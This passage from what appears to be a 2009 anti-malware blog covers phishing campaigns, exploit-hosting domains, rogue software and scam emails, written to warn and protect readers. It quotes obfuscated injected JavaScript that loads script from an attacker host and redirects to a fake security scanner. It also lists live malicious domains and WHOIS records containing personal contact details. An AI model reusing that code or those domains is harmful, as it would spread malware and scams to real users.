76.115.11.52 - c-76-115-11-52.hsd1.wa.comcast.net
98.235.109.247 - c-98-235-109-247.hsd1.pa.comcast.net
98.235.149.126 - c-98-235-149-126.hsd1.pa.comcast.net
24.164.131.147 - cpe-24-164-131-147.nyc.res.rr.com
95.96.143.37 - dhcp-095-096-143-037.chello.nl
208.107.67.19 - host-19-67-107-208.midco.net
95.235.181.233 - host233-181-dynamic.235-95-r.retail.telecomitalia.it
88.132.124.178 - host-88-132-124-178.prtelecom.hu


As you can see, by far the worst affected at present, appears to be Comcast customers. I've not looked into which botnet is actually responsible for this yet, but no doubt the number of drones involved, will grow over the next few days or so.

As has been mentioned many many many times before;

1. DO NOT click links in e-mails. If you do not know your banks URL, look on your last bank statement, it will be on there, then MANUALLY type it into your browsers address bar.

2. DO NOT use HTML e-mail. Using HTML e-mail not only allows them to cloak the REAL URL you will be taken to, it also allows an infection vector - it may not be as pretty, but stick with PLAIN TEXT E-MAIL

3. YOUR BANK WILL NEVER ASK FOR THE DETAILS THESE PHISHING SCAMS ASK FOR!!! DO NOT BE FOOLED INTO HANDING IT OVER. IF IN DOUBT, CALL YOUR BANK!.

It should be noted, though it should also be obvious, Alliance and Leicester are not the only bank whose customers are being phished. I'm also seeing a slew of Halifax, Lloyds TSB, Abbey National, etc etc etc phishing scams coming into my inbox at present (and yes, I'm deliberately not filtering them out - I actually like receiving spam and phishing scams - provides for nice little blog articles such as this).

/edit 14:09 23-07-2009

This one just came in a couple minutes ago, making the number of domains now 10;

http://hosts-file.net/?s=www.mybank.alliance-leicester950.com

IP's:

76.115.11.52 - c-76-115-11-52.hsd1.wa.comcast.net
99.37.122.59 - adsl-99-37-122-59.dsl.chcgil.sbcglobal.net
200.204.145.250 - 200-204-145-250.speedyterra.com.br
88.132.124.178 - host-88-132-124-178.prtelecom.hu
68.54.210.173 - c-68-54-210-173.hsd1.in.comcast.net
97.90.152.194 - 97-90-152-194.static.mtpk.ca.charter.com
95.96.143.37 - dhcp-095-096-143-037.chello.nl
24.8.130.146 - c-24-8-130-146.hsd1.co.comcast.net
68.61.133.232 - c-68-61-133-232.hsd1.mi.comcast.net
74.210.187.149 - 74-210-187-149.hy.cgocable.ca

/edit 15:58 23-07-2009

www.mybank.alliance-leicester184.com

95.235.181.233 - host233-181-dynamic.235-95-r.retail.telecomitalia.it
74.75.104.93 - cpe-74-75-104-93.maine.res.rr.com
69.250.79.6 - c-69-250-79-6.hsd1.md.comcast.net
95.96.143.37 - dhcp-095-096-143-037.chello.nl
200.204.145.250 - 200-204-145-250.speedyterra.com.br
202.77.97.227 - mail.ykkbi.or.id
209.169.140.119 - 140-119.mc.royaume.com
219.83.125.242 - Resolution failed
63.26.180.234 - 1Cust5354.an4.chi30.da.uu.net
65.202.231.12 - Resolution failed

DirectI: A return to old form?

UPDATE: http://hphosts.blogspot.com/2009/07/directi-update.html

Have DirectI returned to old form again, or is this just a coincidence?

http://msmvps.com/blogs/spywaresucks/archive/2009/07/22/1704910.aspx

The screenshot above left, shows a domain used in an exploit campaign, registered via DirectI. Then of course, there's this lot (all exploit domains so DO NOT LOAD IN A BROWSER!), all of which resolve to:

IP: 78.47.25.168
PTR: static.168.25.47.78.clients.your-server.de
Desc: FastVPS Ltd, St Petersburg, Russia

bigtopstats.cn
gqil.in
gzpf.in
lzwn.in
q0a.in
q0c.in
q0i.in
q0j.in
q0k.in
q0l.in
q0u.in
q0v.in
q0w.in
q0x.in
q1b.in
q1d.in
q1e.in
q1f.in
q1l.in
q1m.in
q1u.in
q1v.in
q1w.in
q3b.in
q3c.in
q3n.in
q3o.in
q3s.in
q5a.in
q5c.in
q5k.in
q5l.in
q5m.in
q5u.in
q5v.in
q5x.in
thehomename.cn
u0c.in
u0e.in
u0s.in
u0t.in
u1a.in
u1b.in
u1l.in
u1m.in
u1w.in
u1x.in
u1y.in
u3h.in
u3j.in
u3m.in
u3v.in
u3y.in
u4w.in
u5c.in
u5d.in
u5e.in
u5k.in
u5l.in
u5m.in
u5t.in
u5v.in
u5w.in
u6c.in
u6d.in
u6l.in
u6n.in
u6v.in
u6x.in
u7e.in
u7f.in
u7g.in
u7o.in
u7p.in
u7z.in
u8b.in
u8i.in
u8j.in
u8t.in
u8v.in
u9b.in
u9c.in
u9i.in
u9j.in
u9k.in
www.q0a.in
www.q0c.in
www.q0i.in
www.q0j.in
www.q0k.in
www.q0l.in
www.q0u.in
www.q0v.in
www.q0w.in
www.q0x.in
www.q1b.in
www.q1d.in
www.q1e.in
www.q1f.in
www.q1k.in
www.q1l.in
www.q1m.in
www.q1n.in
www.q1u.in
www.q1v.in
www.q1w.in
www.q3b.in
www.q3c.in
www.q3e.in
www.q3n.in
www.q3o.in
www.q3s.in
www.q5a.in
www.q5c.in
www.q5k.in
www.q5l.in
www.q5m.in
www.q5u.in
www.q5v.in
www.q5x.in
www.thehomename.cn
www.u0c.in
www.u0e.in
www.u0t.in
www.u1a.in
www.u1b.in
www.u1j.in
www.u1l.in
www.u1m.in
www.u1w.in
www.u1x.in
www.u1y.in
www.u3h.in
www.u3j.in
www.u3m.in
www.u3v.in
www.u3y.in
www.u4w.in
www.u5c.in
www.u5d.in
www.u5e.in
www.u5k.in
www.u5l.in
www.u5m.in
www.u5t.in
www.u5v.in
www.u5w.in
www.u6c.in
www.u6d.in
www.u6l.in
www.u6n.in
www.u6v.in
www.u6x.in
www.u7e.in
www.u7f.in
www.u7g.in
www.u7o.in
www.u7p.in
www.u7z.in
www.u8b.in
www.u8i.in
www.u8j.in
www.u8t.in
www.u8v.in
www.u9b.in
www.u9c.in
www.u9i.in
www.u9j.in
www.u9k.in
www.x0b.in
www.x0c.in
www.x0q.in
www.x0v.in
www.x1h.in
www.x1i.in
www.x1v.in
www.x3a.in
www.x3b.in
www.x3y.in
www.x5o.in
www.x6h.in
www.x6i.in
www.x6q.in
www.x6r.in
www.x7b.in
www.x7c.in
www.x7d.in
www.x7k.in
www.x7l.in
www.x7o.in
www.x8c.in
www.x8e.in
www.x8f.in
www.x8m.in
www.x8n.in
www.x8o.in
www.x8u.in
www.x8v.in
www.x8w.in
www.x8y.in
www.x9d.in
www.x9e.in
www.x9f.in
www.x9g.in
www.x9m.in
www.x9n.in
www.x9o.in
www.x9p.in
www.x9u.in
www.x9v.in
www.x9w.in
www.x9y.in
x0b.in
x0c.in
x0q.in
x0v.in
x1h.in
x1i.in
x3a.in
x3b.in
x3y.in
x5o.in
x6h.in
x6i.in
x6q.in
x6r.in
x7c.in
x7d.in
x7l.in
x7o.in
x8c.in
x8e.in
x8f.in
x8m.in
x8n.in
x8o.in
x8v.in
x8w.in
x8y.in
x9d.ru
x9e.in
x9f.in
x9g.in
x9m.in
x9n.in
x9n.ru
x9o.in
x9p.in
x9v.in
x9w.in
x9y.in


inetnum: 78.47.25.128 - 78.47.25.191
netname: FASTVPS-LTD
descr: FastVPS Ltd
country: DE
admin-c: OL203-RIPE
tech-c: OL203-RIPE
status: ASSIGNED PA
mnt-by: HOS-GUN
source: RIPE # Filtered

person: Oleg Lyubimov
address: Leninskiy pr. 96-1-128
address: 198332 Saint-Petersburg
address: RUSSIAN FEDERATION
phone: +79219707212
fax-no: +79219707212
e-mail: oleg.lyubimov@gmail.com
nic-hdl: OL203-RIPE
mnt-by: HOS-GUN
source: RIPE # Filtered

:: Information related to '78.46.0.0/15AS24940'

route: 78.46.0.0/15
descr: HETZNER-RZ-NBG-BLK5
origin: AS24940
org: ORG-HOA1-RIPE
mnt-by: HOS-GUN
source: RIPE # Filtered

organisation: ORG-HOA1-RIPE
org-name: Hetzner Online AG
org-type: LIR
address: Hetzner Online AG
Attn. Martin Hetzner
Stuttgarter Str. 1
91710 Gunzenhausen
GERMANY
phone: +49 9831 610061
fax-no: +49 9831 610062
e-mail: info@hetzner.de
admin-c: GM834-RIPE
admin-c: HOAC1-RIPE
admin-c: MH375-RIPE
admin-c: RB1502-RIPE
admin-c: SK2374-RIPE
admin-c: DM93-RIPE
mnt-ref: HOS-GUN
mnt-ref: RIPE-NCC-HM-MNT
mnt-by: RIPE-NCC-HM-MNT
source: RIPE # Filtered


But we're not done yet. We're also seeing these resolve to additional IP's:

79.170.89.217 - netvibe.xlshosting.net
80.93.90.88 - 8442hd90088.ikexpress.com
91.121.167.41 - ks361128.kimsufi.com
91.121.174.19 - vidpic3.com
213.251.176.169 - ks35069.kimsufi.com

These contain yet more malicious domains, some also registered via DirectI, such as the one in the screenshot at the top of this post!.

Wonder what their excuse for this will be? (already fired off an e-mail as I'm dying to see them try and worm their way out of this one - surely they knew we'd be monitoring them?).

References:

MalwareURL - 78.47.25.168
http://www.malwareurl.com/search.php?domain=&s=78.47.25.168&match=0&rp=200&urls=on&redirs=on&ip=on&reverse=on&as=on

MalwareURL - 79.170.89.217
http://www.malwareurl.com/search.php?domain=&s=79.170.89.217&match=0&rp=200&urls=on&redirs=on&ip=on&reverse=on&as=on

MalwareURL - 80.93.90.88
http://www.malwareurl.com/search.php?domain=&s=80.93.90.88&match=0&rp=200&urls=on&redirs=on&ip=on&reverse=on&as=on

MalwareURL - 91.121.
http://www.malwareurl.com/search.php?domain=&s=91.121&match=0&rp=200&urls=on&redirs=on&ip=on&reverse=on&as=on

MalwareURL - 213.251.176.169
http://www.malwareurl.com/search.php?domain=&s=213.251.176.169&match=0&rp=200&urls=on&redirs=on&ip=on&reverse=on&as=on

Update re digitalspy.co.uk
http://msmvps.com/blogs/spywaresucks/archive/2009/07/22/1704910.aspx

Russian Business Network Updates
http://temerc.com/forums/viewtopic.php?f=4&t=3888

ALERT: please be extremely cautious when visiting digitalspy.co.uk
http://msmvps.com/blogs/spywaresucks/archive/2009/07/20/1703278.aspx

DirectI and HostFresh still supporting criminals!
http://hphosts.blogspot.com/2008/10/directi-and-hostfresh-still-supporting.html

Wednesday, 22 July 2009

BlackHat SEO campaigns change tactics

Over the past few weeks, I've noticed a couple of interesting changes in the tactics used by those responsible for the BlackHat SEO campaigns. First and foremost, let's trackback a second, to June, which documented one of the campaigns.

The campaign documented in June, references a few characteristics that could be used to identify them, and rip them out of the index. So what's changed? Well first and foremost, the .htm files have been changed to .php files;



Second, 2.js is now only included in the file, if the HTTP REFERER server var, is the Google search string, for example;

http://vurl.mysteryfcm.co.uk/?url=740536

There's a few obvious reasons for this, the first being to prevent direct analysis. However, since the referer can be faked, there's nothing they can do to prevent us finding this. Additionally, the .js file can be accessed directly, so this doesn't really help them either.

There's also a new campaign however, that uses similar characteristics. I say similar because;

1. There's the obligatory .js file (in this case Bsrajp.js) that's only included if the referer points to Google
2. The .js file doesn't use the same method as before to obfuscate the code
3. We can no longer just load the URL the decoded script gives us, as it now requires for the SEOREF (which should point to Google) and HTTP_REFERER (which points back to the site that loaded our .js file) vars be properly populated, and point to the correct referers.

The new obfuscation is extremely poor;

Oukaoy=document; Fbhm='rrer'; var Qtoheo="U";
var Iqza=new Array();
Qtoheo+='RL'; Fbhm='refe'+Fbhm;
Iqza[12]="8";
Iqza[7]="atist";
Iqza[19]="&defau"+"lt_ke"+"yword=sex";
Iqza[5]="ttp://qu";
Iqza[13]="&seoref="+encodeURIComponent(Oukaoy[Fbhm]);
Iqza[17]="P_REFE";
Iqza[21]="scr";
Iqza[14]="¶m";
Iqza[20]="\"></";
Iqza[15]="eter=$ke";
Iqza[4]="h";
Iqza[8]="ic.com/in.";
Iqza[1]="scri";
Iqza[9]="cgi?";
Iqza[16]="yword&se=$se&ur=1&HTT";
Iqza[18]="RER="+encodeURIComponent(Oukaoy[Qtoheo]);
Iqza[10]="8&gro";
Iqza[2]="pt src";
Iqza[22]="ipt>";
Iqza[6]="ickst";
Iqza[0]="<";
Iqza[3]="=\"";
Iqza[11]="up=n16040";
for (var Xjko=0;Xjko<Iqza.length;Xjko++)
document.write(Iqza[Xjko]);


Which decodes to;

<script src="http://quickstatistic.com/in.cgi?8&group=n160408&seoref=http%3A%2F%2Fwww.google.co.uk%2Fsearch%3Fhl%3Den%26q%3D%2522ppguid.txt.html%2522%26meta%3D¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwilliamrerea82.tripod.com%2F&default_keyword=sex"></script>


This gives us;


redir = 'http://securityscanavailable.com/hitin.php?land=30&affid=17008';
function handleErrorFn() { top.location=redir; }
window.onerror = handleErrorFn;
if (top.location.href != window.location.href) {top.location =redir;
}


You can guess where this leads ....

quickstatistic.com = 74.50.98.121
securityscanavailable.com = 209.44.126.22

What these idiots don't seem to realize is, if the victim has to load the file - we can load and analyze it.

Comodo continues to ignore malware warnings ....

If there was ever any doubt that Comodo was deliberately failing to take action against these malicious sites, then I'm afraid you need to wake up as Mike yet again, provides absolute proof that Comodo is continuing, despite their claims, to help the bad guys.

http://msmvps.com/blogs/hostsnews/archive/2009/07/22/1705234.aspx

Tuesday, 21 July 2009

Bad Actors Part 7 - 3fn

Bad Actors Part 7 - 3fn

“Wait … *beep beep* back up for a second, Alex. I heard 3fn was brought down by the FTC!”

That would be correct! On June 4th the FTC served a takedown notice that essentially dropped 3fn (aka “Triple Fiber Network”, Pricewert, APX Telecom, APS Communications) off the Internet. I was approached by law enforcement looking for evidence of malicious activities, and luckily, I was in the midst of writing up an article for my Bad Actors blog series. I decided to wait until a little time had passed before publishing details as not to tip off 3fn and possibly ruin an investigation. (Note that the investigatory group that approached me was at the federal level, but was not the FTC)

Below you’ll find my analysis of their IP blocks and a large amount of data about the Bad Actors whom they supported. Most of the links below are completely Not Safe For Work, possibly malicious, and frankly, many of them are disgusting in name as well as content. It’s not advised that you actually visit any of them. I also have more content that I didn't post, and if you're interested in it, feel free to drop me a line.

As I’ve been talking about in previous posts, there are many different aspects of a network infrastructure that a criminal needs to have in place to operate a successful organization. Let’s think about some of the pieces that need to be stable for a simple client-server SPAM botnet such as Cutwail, which was mainly hosted at 3fn.

First of all, you need to infect a user with the Cutwail malware. This malware could be delivered via a web exploit (such as one of the recent vulnerabilities in Adobe PDF, Office, FireFox, or DirectShow), via a social engineering attack (“You’re missing this video codec – press OK to install), or possibly through other vectors like E-mail or IM. I’ve only seen Pushdo/Cutwail distributed through Exploits and Social Engineering, so let’s focus on those. First, you need to control the sites that are hosting exploits or malware, and you need to be able to redirect or otherwise get users to visit. 3fn was doing plenty of both the redirection, and the actual hosting, as I’ll detail below.


Read more
http://blog.fireeye.com/research/2009/07/bad-actors-part-7-3fn.html

Spambot Search Tool v0.35

Tomas, from Tornevall has been in touch to let me know, whilst spamtrap.tornevall.org was still queryable, and listed on his site, it was actually abandoned some time ago. As such, I've removed it from the SBST routines and released a new version :o)

http://forum.hosts-file.net/viewtopic.php?f=68&p=12168#p12168

Download:
http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

Monday, 20 July 2009

Spambot Search Tool v0.34

Sorry for being so late in posting this here, but I released an update to the SBST yesterday. The main changes were two new DNSBL's (technically 3, but since 2 are run by the same site .....).

http://forum.hosts-file.net/viewtopic.php?f=68&t=1655

My friend Connie has pointed me to a potential problem with the inclusion of the Spamtrap RBL provided by Tornevall (spamtrap.tornevall.org), as it flagged her IP, which considering she's had the same IP for 2 years, is a bit strange (I've advised her to contact them to query this).

If you experience the same with the spamtrap RBL (shown on the SBST web interface as "Tornevall (2)"), you may want to temporarily disable it.

It should be noted, Tornevall mention having different return values (though not sure if this also applies to their spamtrap RBL). If I remember to, I'll try and get these included into the next release.

http://dnsbl.tornevall.org/index.php?do=usage

hpHOSTS - UPDATED July 21st, 2009

hpHOSTS - UPDATED July 21st, 2009

The hpHOSTS Hosts file has been updated. There is now a total of 80,-66 listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
  1. Latest Updated: 21/07/2009 03:00
  2. Last Verified: 21/07/2009 02:00
Download hpHosts now!
http://hosts-file.net/?s=Download

Mass removal + mass addition!

I'm happy to report, I have finished the final round of validation, and am currently in the process of removing over 3000 domains that have failed to resolve over a 5 day period. They will of course continue to be monitored, especially given alot of them were associated with rogues, malware and exploits.

Which brings me to the additions, with special thanks to Anthony at MalwareURL for processing and sending me them, I've added 113 sites that are currently hosting Mebroot exploits.

Example:
http://vurl.mysteryfcm.co.uk/?url=737927

Analysis:
http://wepawet.cs.ucsb.edu/view.php?hash=458a7fa10b3e48340c72c8dc856fbeab&t=1248138822&type=js

The sites DO NOT LOAD THESE IN A BROWSER!

13negro.es
1957buickcarclub.com
433manager.net
abanicoscarbonell.com
abramgames.com
abruzzocountryhouses.com
academiajc.com
academytravel.net
ace-techauto.biz
acmpublishers.com
ac-talant.com
addis1.com
adinehtravel.com
adrianspainting.com
aeronetmx.com
afreshview.com
agrs.net
airflow.co.uk
airflow.com
albantajardines.es
aldo.com.hk
alessandrobenvenuti.net
alicechristov.com
allenpodell.com
allirelands.info
allschoolsarestrange.com
alltollz.org
alyas.it
anbuarchives.com
ancaeginocchio.it
andreolisrl.com
anghouse.com
angloven.org
animeadventurers.com
animeawardz.com
annunciromasexy.com
antoniossilktrees.com
anyexit.com
apartments-corvara.com
articolipubblicitari.it
corryville.org
finetraining.net
flashtek.ca
fomesa.com
fravaproducciones.com
freegroupvideo.us
fulleffectgospelministries.com
funsexworld.com
g-soft.ueuo.com
hentaidai.com
hovirinnankioski.com
icho-2.com
insert-coin.tv
joyeriaprieto.com
jsbtn.com
kidskeyboarding.com
kipiniak.com
kitchenexpo.com
kitexoteclub.com
kurdtelcom.com
latrivalente.com
lesboscorp.com
liliananeves.com
magicclean.com
milkonya.com
mobiletrenz.com
mobilmd.net
mojavetumbleweeds.com
moncayo.es
monkeydreams.net
moviesenlinea.com
myownsecretary.com
navarromusic.net
oloworms.co.uk
orangecrush.de
parfumautomata.com
pasionesflamencas.com
photographis.it
pointingpercy.com
portlotniczy.net
regalo-t.net
reichegger.com
reikisansfrontiere.com
salinaturda.eu
saraworld.com
schneider.hu
shanghaisisa.com
sherryswines.com
skposeidon.nu
sky-europe.net
snookerpoint.ae
stacgroup.net
stolppottery.com
strategicsimulations.net
studiodestasio.net
sushiartnet.com
szeplak-apartman.hu
tabcon.com
taco-mac.com
tereny.com
thick-click.com
tigey.net
tohentai.com
tpmrecords.com
transdalmau.com
tusolma.com
uniformesdibra.com
urbanjazz.org
urlcabin.com
vanessasbistro.com
vanmango.com
ventanademazatlan.com
yygrecords.com


hpObserver Resolution Results
http://hosts-file.net/misc/hpObserver_-_Mebroot_Exploits.html

Saturday, 18 July 2009

Anti-malware expert and CEO, Eugene Kaspersky, offers theory for stopping cybercrime

I've got my own theories on how we could disable most of the malware, but since the theories would involve (in part) the upstreams such as Level3, shutting off major parts of the IP ranges involved, and the government/police forces, actually doing some damn work, and the hosting companies actually bothering to deal with this, instead of fobbing you off (or just not replying at all in some cases) because "the customer always pays on time" (yep, they don't actually say this, but it doesn't take a genius to figure out that this is why alot of them conveniently "ignore" it).

Anyway, I could ramble on forever about this, instead, back to the subject at hand.

I asked him to talk a bit about cybercrime and identity theft.

He mentioned how malware is exploding and cybercrime has become a big enterprise. And the cybercriminals seemed to have done well during the recent global financial meltdown.

One of the latest trends is ATM systems being infected with Trojans giving criminals total access to the money. In some cases the money is unlimited. And the truth is banks and ATM companies are in shock, they don’t know what to do.

I’m enlightened on how cybercrime is becoming more organized. Not like the mafia, but they are businesses whether small independent groups or individuals who trade and rent out their malware, each of these groups with a specific job, working together with the same goal in mind, stealing money. And they are making more and more of it. Many of them don’t know each other, so they work together through a “middle man” of sorts because of the lack of trust that is felt in this criminal environment.

He explains, “We are starting to see more and more cybercriminals targeting social networks because they are so popular. People are always online and they seem to trust everyone and everything in these social networks. They publish their personal information and they download.” He adds, “Simply don’t share your information.”


Read the full article
http://www.examiner.com/x-11905-SF-Cybercrime-Examiner~y2009m7d17-Antimalware-expert-and-CEO-Eugene-Kaspersky-talks-about-cybercrime

Kudos to Donna for the heads up :o)

http://msmvps.com/blogs/donna/archive/2009/07/19/anti-malware-expert-and-ceo-eugene-kaspersky-offers-theory-for-stopping-cybercrime.aspx

Friday, 17 July 2009

Paretologic vs MalwareURL

It seems, instead of Paretologic picking on those that have had them blacklisted for years, they've decided to go after the new guy, which in this case, is my friend Anthony at MalwareURL.

http://www.dynamoo.com/blog/2009/07/paretelogic-vs-malwareurlcom.html

Dear Paretologic, allow me to give you a hint as to why people blacklist you;

1. Your programs have been known to detect "threats" that are not present, on more than one occasion

2. Your RegCure program claims "problems" have been found that are actually not problems at all, and in some cases, will kill the system if the user removes them

3. You do not provide fully functional trials, just scanners that the user then has to pay for, to remove whatever is found - this is a major black mark, especially when you require the user pay for it using a system that YOUR PROGRAM HAS TOLD THEM IS INFECTED! (which amongst other things, then leaves them open to ID theft and having their credit card details stolen)

4. You do not monitor your affiliates, allowing them instead, to spam, scam and otherwise mislead users, in order to peddle your programs (and yes, many of us have tried till we were blue in the face, to notify you of this and get you to take action, you've seemingly ignored all reports I sent, which is why I ended up not bothering to send them anymore).

5. On the vast majority of your "affiliates" sites, there is no mention made, that the download is a SCANNER ONLY (and no "Free Download" does not make it acceptable), in some of the cases I came across, it was listed as a free removal tool, something it quite clearly is NOT.




There is also no mention made, that they are affiliates getting paid to peddle the program, instead they opt to try and make it look like a legit review (whilst we may not be fooled by that and can easily tell the difference, regular users are fooled quite easily by this).

These are just 4 issues that off of the top of my head. Enigma Software Group got listed due to similar behaviour, so we'll be damned if we'll allow other companies to get away with it. Stop your affiliates spamming/scamming and otherwise misleading users, STOP requiring users pay for something from a machine YOU have told them is infected, and perhaps we can talk.

I consider your company rogue - and because of the the issues listed above, amongst others, have had your sites listed in hpHosts for aslong as I can remember.

ClamWin serious F/P again

ClamWin has developed 2 new F/P's in the latest sig update, one not so serious, and one very serious. If you've still not got ClamWin set to report only, I strongly urge you to do so;

C:\Program Files\NetMeeting\cb32.exe: Trojan.Waledac-389 FOUND
C:\WINDOWS\system32\dllcache\cb32.exe: Trojan.Waledac-389 FOUND
C:\WINDOWS\system32\dllcache\userinit.exe: Trojan.Agent-119464 FOUND
C:\WINDOWS\system32\userinit.exe: Trojan.Agent-119464 FOUN

As before, if you do have ClamWin quarantine these instead of reporting, you can restore them from the quarantine folder (just rename the file to remove ".infected" and put them back where they're supposed to be). If you have ClamWin automatically delete them (NO! NO! NO!), you'll need to restore them from the Service Pack files (you did download the ISO's for the SP's, right?).

These F/P's are occuring in this case, on Windows XP (all versions) and Windows Server 2003 (all versions), ClamWin hasn't shown the same F/P's on my Vista machine yet.

Thursday, 16 July 2009

Michael Jackson Phishing Scam, featuring Comodo

Be on the lookout folks. Not only are the malthors using Michaels name to infect the living hell out of you, but it also seems, they're using his name to try and scam as much money as possible out of you. The bad guys in this case, are Digital Target Marketing (digitaltargetmarketing.com - 67.192.83.139), who are responsible for my receiving this;

memorabilia of Michael Jackson

Remember the king of pop with this limited lithograph <http://rdfpl.deckbond.com/djpzw/rkhdvbpf/>

Please Load Images <http://rdfpl.deckbond.com/djpzw/rkhdvbpf/>

________________________________

Please Load Images <http://ndfw.deckbond.com/lsrp/zwrkhsc/bpk/>


Which of course, leads you through;

http://rdfpl.deckbond.com/djpzw/rkhdvbpf/
http://www.online-processingcenter.com/MTAyNjh8MjYzN3wzNjgwNjh8djI=/r?a=2xactuk-071509%7E%7E450%7E%7Etest%7E%7E&p=2637&t=1
https://www.dpbird.com/click.track?CID=101881&AFID=55971&ADID=211389&SID=1227733787
https://www.freemjlitho.com/?mid=581614&a=55971&s=1227733787

You can see the Comodo certificate for freemjlitho.com both in the screenshot top left, and here

Which serves up:



Fill in your details here, and you're taken to:



Say yes to this, and you're taken to:



You get the idea ........ once they're finished trying to get you to buy everything and anything, you finally reach the payment confirmation page. Oh and don't worry, they know you won't change your mind, which is why there's no "Yes, I really am sure I want you to help yourself to my credit card funds!" option.




Registrant:
Telebrands Corp.
79 Two Bridges Road
Fairfield, New Jersey 07004
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: FREEMJLITHO.COM
Created on: 10-Jul-09
Expires on: 10-Jul-10
Last Updated on: 10-Jul-09

Administrative Contact:
Corp., Telebrands ekrueger@telebrands.com
79 Two Bridges Road
Fairfield, New Jersey 07004
United States
(973) 244-5521 Fax --

Technical Contact:
Corp., Telebrands ekrueger@telebrands.com
79 Two Bridges Road
Fairfield, New Jersey 07004
United States
(973) 244-5521 Fax --

Domain servers in listed order:
NS.RACKSPACE.COM
NS2.RACKSPACE.COM

WhoIs server: whois.godaddy.com


But wait, we're not done quite yet. If we go back and load the deckbond.com root (vURL Results), we see a link that takes us to a URL on bestwhole.com, which eventually leads us to;

https://secure.subscriptionmarketinginc.com/wealthtools/new_offer4/index.php?sub=669&sub1=1227755047&sub2=

And yeppers folks, this is another phishing scam.



Domains involved:

deckbond.com - 209.51.140.94
rdfpl.deckbond.com - 209.51.140.94
ndfw.deckbond.com - 209.51.140.94
online-processingcenter.com - 209.90.119.12
dpbird.com - 67.208.135.148
freemjlitho.com - 72.3.187.150
bestwhole.com - 209.90.119.51 (Previously at: 72.32.107.97 - AmcoreRewards.com)
subscriptionmarketinginc.com - 69.93.15.212
secure.subscriptionmarketinginc.com - 69.93.15.212
digitaltargetmarketing.com - 67.192.83.139

I'm actually rather disappointed with this particular one, not just because they're using Michaels name to try and scam vulnerable fans, but also because, as a fan myself, I'd have loved a copy of the stuff they're "selling". Bleedin figures.

Huge addition again ....

Thar be another huge addition folks, 1319 new additions to the database. These come courtesy of my friend Gerhard at Clean-MX.de. Sites involved in malware, RFI and exploits etc.

hpObserver - Clean-MX Domains 16-07-2009
http://hosts-file.net/misc/hpObserver_-_CleanMX160709.html

Note the hpObserver results do not include the URL's, you're best off getting those directly from Clean-MX;

http://support.clean-mx.de/clean-mx/viruses.php?sort=firstseen desc&response=alive

Dear e-mail user

Just received this in my inbox, and thought it was rather funny. Why you ask? Well first - this scammer evidently didn't bother taking the time to at least try and make the scam look legit, and second, other than "WEBMAIL E-mail messaging center", there's no company or website specified - something you're err, meant to include if you're trying to scam users of a particular website or service.

I thought at first, that the e-mail had just been converted to text by my e-mail client, but nope, it was already this apparently in plain text, complete with the god awful formatting.

Dear e-mail user,
This message is from WEBMAIL E-mail messaging center to all
our email account users. We are currently conducting a maintenance
exercise which is for upgrading our database and e-mail account center
Thisexercise involves the deactivation of dormant /unused/invalid email
accounts to make room for further upgrading.
To confirm the validity of your email and to prevent your account
from deactivation, you are advised to update it by proving us with
the following information to alexeifamily@cooperation.net
CONFIRM YOUR EMAIL IDENTITY BELOW
Email Username:
EMAIL Password:
Date of Birth:

Warning!!!
Account owners are expected to update their accounts within 10 working
days after receipt of this notice. Failure to comply with this notice
within the stipulated time will face the risk of loosing his or her
account.

Thanks for your co-operation!
Warning Code: VX2G99AAJ
Web Team
BETA!


The e-mails headers show only a single fake Received From line, with the real originating IP being;

121.241.210.105 - 121.241.210.105.static-kolkata.vsnl.net.in (India, AS4755)

The e-mail address they want you to respond to is alexeifamily@cooperation.net, a Brazillian website hosted at 80.80.229.46 (AS21217 - CH-SAFEHOST, PTR: www.cooperation.net), though unless I'm mistaken, it appears to be a French free e-mail account provider? (pretty wierd considering it's WhoIs references Brazil and Switzerland - not France).

domain: cooperation.net
reg_created: 1998-06-26 00:00:00
expires: 2010-06-25 04:00:00
created: 2001-06-24 11:55:40
changed: 2009-06-05 00:44:50
transfer-prohibited: yes
ns0: host-246.netzwirt.ch
ns1: host-247.netzwirt.ch
owner-c:
nic-hdl: TB100-GANDI
owner-name: Ynternet.org
organisation: Ynternet.org
person: Theo Bondolfi
address: "Fondation Ynternet.org \r\nch. de la branche 17"
zipcode: 1091
city: Grandvaux
country: Switzerland
phone: +41.213113047
fax: ''
email: 95c429c7b960758514471a4a1e2e9110-40616@contact.gandi.net
lastupdated: 2009-03-17 17:02:56
admin-c:
nic-hdl: TB100-GANDI
owner-name: Ynternet.org
organisation: Ynternet.org
person: Theo Bondolfi
address: "Fondation Ynternet.org \r\nch. de la branche 17"
zipcode: 1091
city: Grandvaux
country: Switzerland
phone: +41.213113047
fax: ''
email: 95c429c7b960758514471a4a1e2e9110-40616@contact.gandi.net
lastupdated: 2009-03-17 17:02:56
tech-c:
nic-hdl: AT1908-GANDI
organisation: ~
person: Antonio Terceiro
address: 'Rua Teixeira Barros, 800 apt 707B'
zipcode: 40279080
city: Salvador
country: Brazil
phone: +55.7133312299
fax: ''
email: d0a1291416fae0c9b419960cdf5f4fb4-822167@contact.gandi.net
lastupdated: 2009-04-16 15:44:25
bill-c:
nic-hdl: TB100-GANDI
owner-name: Ynternet.org
organisation: Ynternet.org
person: Theo Bondolfi
address: "Fondation Ynternet.org \r\nch. de la branche 17"
zipcode: 1091
city: Grandvaux
country: Switzerland
phone: +41.213113047
fax: ''
email: 95c429c7b960758514471a4a1e2e9110-40616@contact.gandi.net
lastupdated: 2009-03-17 17:02:56


WhoIs server: whois.gandi.net


I'm actually surprised that this e-mail address is only known to one anti-phishing project (at the time of checking the only two listed in the results led to this one);

http://www.google.co.uk/search?hl=en&q=%22alexeifamily@cooperation.net%22&meta=&aq=f&oq=